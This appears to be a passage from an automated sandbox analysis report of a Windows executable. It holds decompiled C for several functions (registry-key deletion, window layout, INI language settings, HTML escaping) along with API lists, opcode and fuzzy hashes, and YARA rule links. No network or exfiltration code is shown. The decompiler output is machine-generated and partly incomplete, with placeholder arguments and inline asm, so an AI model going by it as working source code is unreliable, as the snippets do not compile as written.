                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                                                                  • String ID: %d %I64x
                                                                                                                                                                  • API String ID: 2567117392-2565891505
                                                                                                                                                                  • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 39%
                                                                                                                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                                                                  0x004045c2
                                                                                                                                                                  0x004045d1
                                                                                                                                                                  0x004045da
                                                                                                                                                                  0x004045ef
                                                                                                                                                                  0x004045f6
                                                                                                                                                                  0x00404604
                                                                                                                                                                  0x0040460b
                                                                                                                                                                  0x00404610
                                                                                                                                                                  0x00404616
                                                                                                                                                                  0x00404617
                                                                                                                                                                  0x00404618
                                                                                                                                                                  0x00404628
                                                                                                                                                                  0x00404629
                                                                                                                                                                  0x0040462a
                                                                                                                                                                  0x0040462f
                                                                                                                                                                  0x00404630
                                                                                                                                                                  0x00404631
                                                                                                                                                                  0x0040463c
                                                                                                                                                                  0x0040463d
                                                                                                                                                                  0x0040463e
                                                                                                                                                                  0x00404656
                                                                                                                                                                  0x00404662
                                                                                                                                                                  0x0040466b
                                                                                                                                                                  0x0040466d
                                                                                                                                                                  0x0040466e
                                                                                                                                                                  0x00404674
                                                                                                                                                                  0x00404679

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                                                                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                                                                  • API String ID: 1018939227-3575174989
                                                                                                                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                                  0x0040314a
                                                                                                                                                                  0x00403151
                                                                                                                                                                  0x00403158
                                                                                                                                                                  0x0040315a
                                                                                                                                                                  0x00403162
                                                                                                                                                                  0x00403166
                                                                                                                                                                  0x00403190
                                                                                                                                                                  0x00403190
                                                                                                                                                                  0x00403198
                                                                                                                                                                  0x00403199
                                                                                                                                                                  0x0040319e
                                                                                                                                                                  0x004031bb
                                                                                                                                                                  0x004031a0
                                                                                                                                                                  0x004031ad
                                                                                                                                                                  0x004031b6
                                                                                                                                                                  0x004031b6
                                                                                                                                                                  0x0040319e
                                                                                                                                                                  0x0040316e
                                                                                                                                                                  0x00403176
                                                                                                                                                                  0x0040317c
                                                                                                                                                                  0x0040317f
                                                                                                                                                                  0x0040317f
                                                                                                                                                                  0x00403182
                                                                                                                                                                  0x0040318a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040318c
                                                                                                                                                                  0x0040318c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040318c

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040316E
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                                                                  • MessageBoxW.USER32 ref: 004031AD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                                                                  0x00404da9
                                                                                                                                                                  0x00404dbc
                                                                                                                                                                  0x00404dbf
                                                                                                                                                                  0x00404dc6
                                                                                                                                                                  0x00404dcc
                                                                                                                                                                  0x00404dce
                                                                                                                                                                  0x00404de1
                                                                                                                                                                  0x00404deb
                                                                                                                                                                  0x00404df2
                                                                                                                                                                  0x00404df4
                                                                                                                                                                  0x00404df4
                                                                                                                                                                  0x00404e07
                                                                                                                                                                  0x00404e0d
                                                                                                                                                                  0x00404e18
                                                                                                                                                                  0x00404e1c
                                                                                                                                                                  0x00404e1e
                                                                                                                                                                  0x00404e27
                                                                                                                                                                  0x00404e28
                                                                                                                                                                  0x00404e29
                                                                                                                                                                  0x00404e2f
                                                                                                                                                                  0x00404e31
                                                                                                                                                                  0x00404e37
                                                                                                                                                                  0x00404e41
                                                                                                                                                                  0x00404e42
                                                                                                                                                                  0x00404e43
                                                                                                                                                                  0x00404e46
                                                                                                                                                                  0x00404e46
                                                                                                                                                                  0x00404e1c
                                                                                                                                                                  0x00404e4d
                                                                                                                                                                  0x00404e50
                                                                                                                                                                  0x00404e5f
                                                                                                                                                                  0x00404e66
                                                                                                                                                                  0x00404e52
                                                                                                                                                                  0x00404e52
                                                                                                                                                                  0x00404e52
                                                                                                                                                                  0x00404e6d
                                                                                                                                                                  0x00404e70
                                                                                                                                                                  0x00404e85
                                                                                                                                                                  0x00404e85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404e72
                                                                                                                                                                  0x00404e7b
                                                                                                                                                                  0x00404e80
                                                                                                                                                                  0x00404e83
                                                                                                                                                                  0x00404e87
                                                                                                                                                                  0x00404e89
                                                                                                                                                                  0x00404e8b
                                                                                                                                                                  0x00404e8b
                                                                                                                                                                  0x00404ea8
                                                                                                                                                                  0x00404ea8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404e83

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                                                                  • GetDC.USER32 ref: 00404DD5
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00404E07
                                                                                                                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00404E2F
                                                                                                                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2163313125-0
                                                                                                                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                                  0x0040639c
                                                                                                                                                                  0x004063a4
                                                                                                                                                                  0x004063b2
                                                                                                                                                                  0x004063c2
                                                                                                                                                                  0x004063d3
                                                                                                                                                                  0x004063dc
                                                                                                                                                                  0x004063eb
                                                                                                                                                                  0x004063f0
                                                                                                                                                                  0x00406401
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040641e
                                                                                                                                                                  0x0040641f

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                                  0x0040adf6
                                                                                                                                                                  0x0040adf8
                                                                                                                                                                  0x0040adfa
                                                                                                                                                                  0x0040adfb
                                                                                                                                                                  0x0040adfb
                                                                                                                                                                  0x0040ae02
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae04
                                                                                                                                                                  0x0040ae05
                                                                                                                                                                  0x0040ae6d
                                                                                                                                                                  0x0040ae6e
                                                                                                                                                                  0x0040ae73
                                                                                                                                                                  0x0040ae76
                                                                                                                                                                  0x0040ae7f
                                                                                                                                                                  0x0040ae83
                                                                                                                                                                  0x0040ae86
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae86
                                                                                                                                                                  0x0040ae8f
                                                                                                                                                                  0x0040ae0c
                                                                                                                                                                  0x0040ae10
                                                                                                                                                                  0x0040ae1e
                                                                                                                                                                  0x0040ae3b
                                                                                                                                                                  0x0040ae4a
                                                                                                                                                                  0x0040ae65
                                                                                                                                                                  0x0040ae7a
                                                                                                                                                                  0x0040ae7e
                                                                                                                                                                  0x0040ae67
                                                                                                                                                                  0x0040ae67
                                                                                                                                                                  0x0040ae68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae68
                                                                                                                                                                  0x0040ae4c
                                                                                                                                                                  0x0040ae4c
                                                                                                                                                                  0x0040ae4e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae4e
                                                                                                                                                                  0x0040ae3d
                                                                                                                                                                  0x0040ae3d
                                                                                                                                                                  0x0040ae3f
                                                                                                                                                                  0x0040ae53
                                                                                                                                                                  0x0040ae54
                                                                                                                                                                  0x0040ae59
                                                                                                                                                                  0x0040ae5c
                                                                                                                                                                  0x0040ae5c
                                                                                                                                                                  0x0040ae20
                                                                                                                                                                  0x0040ae28
                                                                                                                                                                  0x0040ae2d
                                                                                                                                                                  0x0040ae30
                                                                                                                                                                  0x0040ae30
                                                                                                                                                                  0x0040ae12
                                                                                                                                                                  0x0040ae12
                                                                                                                                                                  0x0040ae13
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae13
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae10

                                                                                                                                                                  APIs
                                                                                                                                                                  • memcpy.MSVCRT(?,&quot;,0000000C,00000000,?,?,004076E3), ref: 0040AE28
                                                                                                                                                                  • memcpy.MSVCRT(?,&amp;,0000000A,00000000,?,?,004076E3), ref: 0040AE54
                                                                                                                                                                  • memcpy.MSVCRT(?,&lt;,00000008,00000000,?,?,004076E3), ref: 0040AE6E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                                                                  0x004041f9
                                                                                                                                                                  0x00404205
                                                                                                                                                                  0x00404208
                                                                                                                                                                  0x00404217
                                                                                                                                                                  0x0040421e
                                                                                                                                                                  0x00404236
                                                                                                                                                                  0x0040423f
                                                                                                                                                                  0x0040424a
                                                                                                                                                                  0x0040425f
                                                                                                                                                                  0x0040426b
                                                                                                                                                                  0x0040426e
                                                                                                                                                                  0x0040426e
                                                                                                                                                                  0x00404275
                                                                                                                                                                  0x004043be
                                                                                                                                                                  0x004043ce
                                                                                                                                                                  0x004043d0
                                                                                                                                                                  0x004043d3
                                                                                                                                                                  0x004043da
                                                                                                                                                                  0x004043da
                                                                                                                                                                  0x004043c0
                                                                                                                                                                  0x004043c3
                                                                                                                                                                  0x004043c3
                                                                                                                                                                  0x0040427b
                                                                                                                                                                  0x0040428c
                                                                                                                                                                  0x0040428f
                                                                                                                                                                  0x00404295
                                                                                                                                                                  0x004042a5
                                                                                                                                                                  0x004042b8
                                                                                                                                                                  0x004042cb
                                                                                                                                                                  0x004042de
                                                                                                                                                                  0x004042f1
                                                                                                                                                                  0x00404304
                                                                                                                                                                  0x00404317
                                                                                                                                                                  0x0040432a
                                                                                                                                                                  0x0040433d
                                                                                                                                                                  0x00404350
                                                                                                                                                                  0x00404363
                                                                                                                                                                  0x00404376
                                                                                                                                                                  0x00404389
                                                                                                                                                                  0x0040439c
                                                                                                                                                                  0x004043a4
                                                                                                                                                                  0x004043af
                                                                                                                                                                  0x004043b5
                                                                                                                                                                  0x004043b5
                                                                                                                                                                  0x004043f5

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040421E
                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT(00000000,?,00000104,?,00402FB2,0040ACC4,?,?,00000000), ref: 00404940
                                                                                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
